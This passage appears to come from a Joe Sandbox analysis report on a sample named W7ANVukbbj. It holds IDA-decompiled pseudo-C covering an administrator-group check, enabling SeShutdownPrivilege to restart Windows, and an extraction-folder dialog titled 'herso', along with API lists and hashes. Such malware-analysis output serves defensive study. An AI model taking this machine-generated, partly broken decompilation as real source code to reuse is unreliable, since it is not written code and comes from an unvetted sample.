                                                                                                                                                                                                          				_t45 = 0;
                                                                                                                                                                                                          				_v12 = 0x500;
                                                                                                                                                                                                          				_t50 = 2;
                                                                                                                                                                                                          				_v16.Value = 0;
                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                          				if(_t25 != _t50) {
                                                                                                                                                                                                          					L20:
                                                                                                                                                                                                          					return E00866CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(E008617EE( &_v20) != 0) {
                                                                                                                                                                                                          					_t25 = _v20;
                                                                                                                                                                                                          					if(_v20 != 0) {
                                                                                                                                                                                                          						 *0x868128 = 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L20;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                          					goto L20;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                          					CloseHandle(_v28);
                                                                                                                                                                                                          					_t25 = _v20;
                                                                                                                                                                                                          					goto L20;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_push(__esi);
                                                                                                                                                                                                          					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                          					if(_t52 == 0) {
                                                                                                                                                                                                          						L16:
                                                                                                                                                                                                          						_pop(_t51);
                                                                                                                                                                                                          						goto L17;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                          						L15:
                                                                                                                                                                                                          						LocalFree(_t52);
                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						if( *_t52 <= 0) {
                                                                                                                                                                                                          							L14:
                                                                                                                                                                                                          							FreeSid(_v32);
                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                          						_t50 = _t15;
                                                                                                                                                                                                          						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                          							_t45 = _t45 + 1;
                                                                                                                                                                                                          							_t50 = _t50 + 8;
                                                                                                                                                                                                          							if(_t45 <  *_t52) {
                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *0x868128 = 1;
                                                                                                                                                                                                          						_v20 = 1;
                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 008617EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,008618DD), ref: 0086181A
                                                                                                                                                                                                            • Part of subcall function 008617EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0086182C
                                                                                                                                                                                                            • Part of subcall function 008617EE: AllocateAndInitializeSid.ADVAPI32(008618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,008618DD), ref: 00861855
                                                                                                                                                                                                            • Part of subcall function 008617EE: FreeSid.ADVAPI32(?,?,?,?,008618DD), ref: 00861883
                                                                                                                                                                                                            • Part of subcall function 008617EE: FreeLibrary.KERNEL32(00000000,?,?,?,008618DD), ref: 0086188A
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 008618EB
                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 008618F2
                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0086190A
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00861918
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,?,?), ref: 0086192C
                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00861944
                                                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00861964
                                                                                                                                                                                                          • EqualSid.ADVAPI32(00000004,?), ref: 0086197A
                                                                                                                                                                                                          • FreeSid.ADVAPI32(?), ref: 0086199C
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 008619A3
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 008619AD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2168512254-0
                                                                                                                                                                                                          • Opcode ID: 3831d014ddd9635308b88dfc84cd14b2805a511e421fc67e9e0d1dcbe44bf55e
                                                                                                                                                                                                          • Instruction ID: bfb9a09399ba0e53a106b320a3f9f819a8b227cef5e80c519e1483168c89c423
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3831d014ddd9635308b88dfc84cd14b2805a511e421fc67e9e0d1dcbe44bf55e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A314A71A00209EFDF209FA5DC99AAFBFBCFF04304F561429E645E2161EB719905CB62
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                                          			E00861F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                          				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                                          				int _t21;
                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                          				int _t28;
                                                                                                                                                                                                          				signed char _t30;
                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t41 = __esi;
                                                                                                                                                                                                          				_t38 = __edi;
                                                                                                                                                                                                          				_t30 = __ecx;
                                                                                                                                                                                                          				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                          					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                          						if( *0x869a40 != 0) {
                                                                                                                                                                                                          							_pop(_t30);
                                                                                                                                                                                                          							_t44 = _t46;
                                                                                                                                                                                                          							_t13 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                          							_push(_t38);
                                                                                                                                                                                                          							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                          								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                          								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                          								_v12 = 2;
                                                                                                                                                                                                          								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                          								CloseHandle(_v28);
                                                                                                                                                                                                          								_t41 = _t41;
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								if(_t21 != 0) {
                                                                                                                                                                                                          									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                          										_t25 = 1;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t37 = 0x4f7;
                                                                                                                                                                                                          										goto L3;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t37 = 0x4f6;
                                                                                                                                                                                                          									goto L4;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t37 = 0x4f5;
                                                                                                                                                                                                          								L3:
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								L4:
                                                                                                                                                                                                          								_push(0x10);
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								E008644B9(0, _t37);
                                                                                                                                                                                                          								_t25 = 0;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_pop(_t40);
                                                                                                                                                                                                          							return E00866CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t37 = 0x522;
                                                                                                                                                                                                          						_t28 = E008644B9(0, 0x522, 0x861140, 0, 0x40, 4);
                                                                                                                                                                                                          						if(_t28 != 6) {
                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					__eax = E00861EA7(__ecx);
                                                                                                                                                                                                          					if(__eax != 2) {
                                                                                                                                                                                                          						L16:
                                                                                                                                                                                                          						return _t28;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}


















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00861EFB
                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00861F02
                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00861FD3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                                                                          • API String ID: 2795981589-3733053543
                                                                                                                                                                                                          • Opcode ID: 0be5f414c2daa4b7aad01b7502c19cfe67b77939c09cc001c5ae68923b1aecdf
                                                                                                                                                                                                          • Instruction ID: 5a48f666cce1e957b9155409394e6247254557998bb1054e33b8c3debd196b23
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0be5f414c2daa4b7aad01b7502c19cfe67b77939c09cc001c5ae68923b1aecdf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E721F971B40205BBDF209BA59C4EFBF76B8FB85B10F161018FA02E6182DF7588019662
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00867155() {
                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                          				struct _FILETIME _v16;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                          				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                          				_t23 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                          					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                          					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                          					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                          					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                          					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                          					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                          					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                          					_t39 = _t36;
                                                                                                                                                                                                          					if(_t36 == 0xbb40e64e || ( *0x868004 & 0xffff0000) == 0) {
                                                                                                                                                                                                          						_t36 = 0xbb40e64f;
                                                                                                                                                                                                          						_t39 = 0xbb40e64f;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *0x868004 = _t39;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t37 =  !_t36;
                                                                                                                                                                                                          				 *0x868008 = _t37;
                                                                                                                                                                                                          				return _t37;
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00867182
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00867191
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0086719A
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 008671A3
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 008671B8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1445889803-0
                                                                                                                                                                                                          • Opcode ID: 300c7f33a6fb21ee764bfdc464e9c19284375df29d3cac951bc61bce44204d5d
                                                                                                                                                                                                          • Instruction ID: 291dadb60f799540f9ce16a1dc3d1bb42484bd1cf9e126e33ced7bc1955bc1c6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 300c7f33a6fb21ee764bfdc464e9c19284375df29d3cac951bc61bce44204d5d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58114871D01608EFCB14DFB8DA48A9EB7F8FF19314F625966E806E7210EA709A048F41
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00866CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                          
                                                                                                                                                                                                          				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                          				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                          			}



                                                                                                                                                                                                          0x00866cf7
                                                                                                                                                                                                          0x00866d00
                                                                                                                                                                                                          0x00866d19

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00866E26,00861000), ref: 00866CF7
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00866E26,?,00866E26,00861000), ref: 00866D00
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,00866E26,00861000), ref: 00866D0B
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00866E26,00861000), ref: 00866D12
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                                          • Opcode ID: 6ca2fbdcf6f03ef026a04d05434f4fdfd87b929ab20558461e6ea2b91e6c6386
                                                                                                                                                                                                          • Instruction ID: 85cd3eb6e65a623585eb29780365c8f13072c33899e078f0c4f474fbed733776
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ca2fbdcf6f03ef026a04d05434f4fdfd87b929ab20558461e6ea2b91e6c6386
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D01232000108BBDB042BF1EC0CA593F28FB4A312F466000F31FA6020CBB29451CF53
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                                          			E00863210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                          				int _t20;
                                                                                                                                                                                                          				int _t21;
                                                                                                                                                                                                          				int _t23;
                                                                                                                                                                                                          				char _t24;
                                                                                                                                                                                                          				long _t25;
                                                                                                                                                                                                          				int _t27;
                                                                                                                                                                                                          				int _t30;
                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                          				int _t33;
                                                                                                                                                                                                          				int _t34;
                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                          				int _t39;
                                                                                                                                                                                                          				void* _t42;
                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                          				CHAR* _t49;
                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                          				struct HWND__* _t64;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t64 = _a4;
                                                                                                                                                                                                          				_t6 = _a8 - 0x10;
                                                                                                                                                                                                          				if(_t6 == 0) {
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					L38:
                                                                                                                                                                                                          					EndDialog(_t64, ??);
                                                                                                                                                                                                          					L39:
                                                                                                                                                                                                          					__eflags = 1;
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t42 = 1;
                                                                                                                                                                                                          				_t10 = _t6 - 0x100;
                                                                                                                                                                                                          				if(_t10 == 0) {
                                                                                                                                                                                                          					E008643D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                          					SetWindowTextA(_t64, "herso");
                                                                                                                                                                                                          					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                          					__eflags =  *0x869a40 - _t42; // 0x3
                                                                                                                                                                                                          					if(__eflags == 0) {
                                                                                                                                                                                                          						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L36:
                                                                                                                                                                                                          					return _t42;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t10 == _t42) {
                                                                                                                                                                                                          					_t20 = _a12 - 1;
                                                                                                                                                                                                          					__eflags = _t20;
                                                                                                                                                                                                          					if(_t20 == 0) {
                                                                                                                                                                                                          						_t21 = GetDlgItemTextA(_t64, 0x835, 0x8691e4, 0x104);
                                                                                                                                                                                                          						__eflags = _t21;
                                                                                                                                                                                                          						if(_t21 == 0) {
                                                                                                                                                                                                          							L32:
                                                                                                                                                                                                          							_t58 = 0x4bf;
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							_push(0x10);
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							L25:
                                                                                                                                                                                                          							E008644B9(_t64, _t58);
                                                                                                                                                                                                          							goto L39;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t49 = 0x8691e4;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t23 =  *_t49;
                                                                                                                                                                                                          							_t49 =  &(_t49[1]);
                                                                                                                                                                                                          							__eflags = _t23;
                                                                                                                                                                                                          						} while (_t23 != 0);
                                                                                                                                                                                                          						__eflags = _t49 - 0x8691e5 - 3;
                                                                                                                                                                                                          						if(_t49 - 0x8691e5 < 3) {
                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t24 =  *0x8691e5; // 0x3a
                                                                                                                                                                                                          						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                          						if(_t24 == 0x3a) {
                                                                                                                                                                                                          							L21:
                                                                                                                                                                                                          							_t25 = GetFileAttributesA(0x8691e4);
                                                                                                                                                                                                          							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                          							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                          								L26:
                                                                                                                                                                                                          								E0086658A(0x8691e4, 0x104, 0x861140);
                                                                                                                                                                                                          								_t27 = E008658C8(0x8691e4);
                                                                                                                                                                                                          								__eflags = _t27;
                                                                                                                                                                                                          								if(_t27 != 0) {
                                                                                                                                                                                                          									__eflags =  *0x8691e4 - 0x5c;
                                                                                                                                                                                                          									if( *0x8691e4 != 0x5c) {
                                                                                                                                                                                                          										L30:
                                                                                                                                                                                                          										_t30 = E0086597D(0x8691e4, 1, _t64, 1);
                                                                                                                                                                                                          										__eflags = _t30;
                                                                                                                                                                                                          										if(_t30 == 0) {
                                                                                                                                                                                                          											L35:
                                                                                                                                                                                                          											_t42 = 1;
                                                                                                                                                                                                          											__eflags = 1;
                                                                                                                                                                                                          											goto L36;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										L31:
                                                                                                                                                                                                          										_t42 = 1;
                                                                                                                                                                                                          										EndDialog(_t64, 1);
                                                                                                                                                                                                          										goto L36;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags =  *0x8691e5 - 0x5c;
                                                                                                                                                                                                          									if( *0x8691e5 == 0x5c) {
                                                                                                                                                                                                          										goto L31;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L30;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								_push(0x10);
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								_t58 = 0x4be;
                                                                                                                                                                                                          								goto L25;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t32 = E008644B9(_t64, 0x54a, 0x8691e4, 0, 0x20, 4);
                                                                                                                                                                                                          							__eflags = _t32 - 6;
                                                                                                                                                                                                          							if(_t32 != 6) {
                                                                                                                                                                                                          								goto L35;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t33 = CreateDirectoryA(0x8691e4, 0);
                                                                                                                                                                                                          							__eflags = _t33;
                                                                                                                                                                                                          							if(_t33 != 0) {
                                                                                                                                                                                                          								goto L26;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							_push(0x10);
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							_push(0x8691e4);
                                                                                                                                                                                                          							_t58 = 0x4cb;
                                                                                                                                                                                                          							goto L25;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags =  *0x8691e4 - 0x5c;
                                                                                                                                                                                                          						if( *0x8691e4 != 0x5c) {
                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                          						if(_t24 != 0x5c) {
                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L21;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t34 = _t20 - 1;
                                                                                                                                                                                                          					__eflags = _t34;
                                                                                                                                                                                                          					if(_t34 == 0) {
                                                                                                                                                                                                          						EndDialog(_t64, 0);
                                                                                                                                                                                                          						 *0x869124 = 0x800704c7;
                                                                                                                                                                                                          						goto L39;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t34 != 0x834;
                                                                                                                                                                                                          					if(_t34 != 0x834) {
                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t37 = LoadStringA( *0x869a3c, 0x3e8, 0x868598, 0x200);
                                                                                                                                                                                                          					__eflags = _t37;
                                                                                                                                                                                                          					if(_t37 != 0) {
                                                                                                                                                                                                          						_t38 = E00864224(_t64, _t46, _t46);
                                                                                                                                                                                                          						__eflags = _t38;
                                                                                                                                                                                                          						if(_t38 == 0) {
                                                                                                                                                                                                          							goto L36;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t39 = SetDlgItemTextA(_t64, 0x835, 0x8687a0);
                                                                                                                                                                                                          						__eflags = _t39;
                                                                                                                                                                                                          						if(_t39 != 0) {
                                                                                                                                                                                                          							goto L36;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t63 = 0x4c0;
                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                          						E008644B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						goto L38;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t63 = 0x4b1;
                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}

























                                                                                                                                                                                                          0x00863256
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863271
                                                                                                                                                                                                          0x00863277
                                                                                                                                                                                                          0x00863279
                                                                                                                                                                                                          0x00863298
                                                                                                                                                                                                          0x0086329d
                                                                                                                                                                                                          0x0086329f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008632b0
                                                                                                                                                                                                          0x008632b6
                                                                                                                                                                                                          0x008632b8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008632be
                                                                                                                                                                                                          0x00863280
                                                                                                                                                                                                          0x00863289
                                                                                                                                                                                                          0x0086328e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086328e
                                                                                                                                                                                                          0x0086327b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086327b
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadStringA.USER32(000003E8,00868598,00000200), ref: 00863271
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 008633E2
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,herso), ref: 008633F7
                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00863410
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000836), ref: 00863426
                                                                                                                                                                                                          • EnableWindow.USER32(00000000), ref: 0086342D
